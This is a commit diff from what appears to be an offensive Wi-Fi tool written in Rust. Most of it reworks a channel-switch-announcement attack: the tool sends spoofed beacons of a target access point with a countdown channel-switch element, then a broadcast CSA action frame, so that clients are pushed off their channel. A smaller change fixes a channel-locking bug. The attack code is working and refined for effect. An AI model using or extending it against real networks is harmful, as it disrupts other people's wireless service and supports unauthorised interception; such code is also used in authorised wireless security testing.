Skip to content

Commit 4df32a0

Browse files
RagntRagnt
committed
Fix channel locking skipping first channel after hop; fixed CSA to make more sense on the wire.
1 parent 437ee16 commit 4df32a0

File tree

3 files changed

+22
-26
lines changed

3 files changed

+22
-26
lines changed

src/attack.rs

Lines changed: 16 additions & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -36,7 +36,7 @@ use crate::{
3636
// //
3737
//////////////////////////////////////////////////////////////
3838

39-
pub fn csa_attack(oxide: &mut OxideRuntime, mut beacon: Beacon) -> Result<(), String> {
39+
pub fn csa_attack(oxide: &mut OxideRuntime, beacon: Beacon) -> Result<(), String> {
4040
if oxide.config.disable_csa {
4141
return Ok(());
4242
}
@@ -74,48 +74,44 @@ pub fn csa_attack(oxide: &mut OxideRuntime, mut beacon: Beacon) -> Result<(), St
7474

7575
// If we are transmitting
7676
if !oxide.config.notx {
77-
let random_client = ap_data
78-
.client_list
79-
.get_random()
80-
.map(|client| client.mac_address);
81-
82-
// Send a CSA action frame to a random client
83-
if let Some(client) = random_client {
84-
let frx = build_csa_action(&client, &ap_data.mac_address, new_channel);
77+
// Send 5 beacons with decreasing counts
78+
for count in (0..6).rev() {
79+
let frx = build_csa_beacon(beacon.clone(), new_channel.into(), count);
8580
let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
8681
oxide.status_log.add_message(StatusMessage::new(
8782
MessageType::Info,
8883
format!(
89-
"CSA Attack (Action): {} => {} ({}) Channel: {}",
84+
"CSA Attack (Beacon): {} ({}) Channel: {} | Count: {}",
9085
ap_mac,
91-
client,
9286
beacon
9387
.station_info
9488
.ssid
9589
.clone()
9690
.unwrap_or("Hidden".to_string()),
97-
new_channel
91+
new_channel,
92+
count
9893
),
9994
));
10095
}
10196

102-
// Send beacons too
103-
for _ in 0..10 {
104-
let frx = build_csa_beacon(beacon.clone(), new_channel.into());
105-
let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
106-
}
97+
let client = MacAddress::broadcast();
10798

108-
ap_data.interactions += 1;
109-
ap_data.auth_sequence.state = 1;
99+
// Send a CSA action frame to broadcast
100+
let frx = build_csa_action(&client, &ap_data.mac_address, new_channel);
101+
let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
110102
oxide.status_log.add_message(StatusMessage::new(
111103
MessageType::Info,
112104
format!(
113-
"CSA Attack (Beacon*10): {} ({}) Channel: {}",
105+
"CSA Attack (Action): {} => {} ({}) Channel: {}",
114106
ap_mac,
107+
client,
115108
beacon.station_info.ssid.unwrap_or("Hidden".to_string()),
116109
new_channel
117110
),
118111
));
112+
113+
ap_data.interactions += 1;
114+
ap_data.auth_sequence.state = 1;
119115
}
120116

121117
Ok(())

src/main.rs

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -2857,7 +2857,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
28572857
channels_binding
28582858
.clone_from(&oxide.if_hardware.hop_channels);
28592859
cycle_iter = channels_binding.iter().cycle();
2860-
first_channel = *cycle_iter.next().unwrap();
2860+
first_channel = *cycle_iter.clone().next().unwrap();
28612861
oxide.if_hardware.locked = !oxide.if_hardware.locked;
28622862
} else {
28632863
// Get target_chans
@@ -2873,7 +2873,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
28732873
channels_binding
28742874
.clone_from(&oxide.if_hardware.hop_channels);
28752875
cycle_iter = channels_binding.iter().cycle();
2876-
first_channel = *cycle_iter.next().unwrap();
2876+
first_channel = *cycle_iter.clone().next().unwrap();
28772877

28782878
oxide.status_log.add_message(StatusMessage::new(
28792879
MessageType::Info,
@@ -2901,7 +2901,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
29012901
channels_binding
29022902
.clone_from(&oxide.if_hardware.hop_channels);
29032903
cycle_iter = channels_binding.iter().cycle();
2904-
first_channel = *cycle_iter.next().unwrap();
2904+
first_channel = *cycle_iter.clone().next().unwrap();
29052905

29062906
oxide.status_log.add_message(StatusMessage::new(
29072907
MessageType::Info,
@@ -2929,7 +2929,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
29292929
channels_binding
29302930
.clone_from(&oxide.if_hardware.hop_channels);
29312931
cycle_iter = channels_binding.iter().cycle();
2932-
first_channel = *cycle_iter.next().unwrap();
2932+
first_channel = *cycle_iter.clone().next().unwrap();
29332933

29342934
oxide.status_log.add_message(StatusMessage::new(
29352935
MessageType::Info,

src/tx.rs

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -722,15 +722,15 @@ pub fn build_probe_response(
722722
rth
723723
}
724724

725-
pub fn build_csa_beacon(beacon: Beacon, new_channel: u32) -> Vec<u8> {
725+
pub fn build_csa_beacon(beacon: Beacon, new_channel: u32, count: u8) -> Vec<u8> {
726726
let mut rth: Vec<u8> = RTH_NO_ACK.to_vec();
727727

728728
let mut frx = beacon.clone();
729729
frx.header.sequence_control.sequence_number =
730730
beacon.header.sequence_control.sequence_number + 1;
731731
frx.station_info
732732
.data
733-
.push((37u8, vec![0u8, new_channel.try_into().unwrap(), 3u8]));
733+
.push((37u8, vec![0u8, new_channel.try_into().unwrap(), count]));
734734

735735
rth.extend(frx.encode());
736736
rth

0 commit comments

Comments
 (0)